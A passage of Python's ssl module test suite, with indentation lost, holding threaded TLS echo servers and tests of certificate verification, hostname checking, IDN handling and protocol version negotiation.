ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with socket_helper.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with socket_helper.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except (ConnectionResetError, ConnectionAbortedError):
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except ssl.SSLError as err:
# On Windows sometimes test_pha_required_nocert receives the
# PEER_DID_NOT_RETURN_A_CERTIFICATE exception
# before the 'tlsv13 alert certificate required' exception.
# If the server is stopped when PEER_DID_NOT_RETURN_A_CERTIFICATE
# is received test_pha_required_nocert fails with ConnectionResetError
# because the underlying socket is closed
if 'PEER_DID_NOT_RETURN_A_CERTIFICATE' == err.reason:
if self.server.chatty and support.verbose:
sys.stdout.write(err.args[1])
# test_pha_required_nocert is expecting this exception
raise ssl.SSLError('tlsv13 alert certificate required')
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = socket_helper.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
if not has_tls_protocol(protocol):
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# TLS 1.3 perform client cert exchange after handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = socket_helper.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
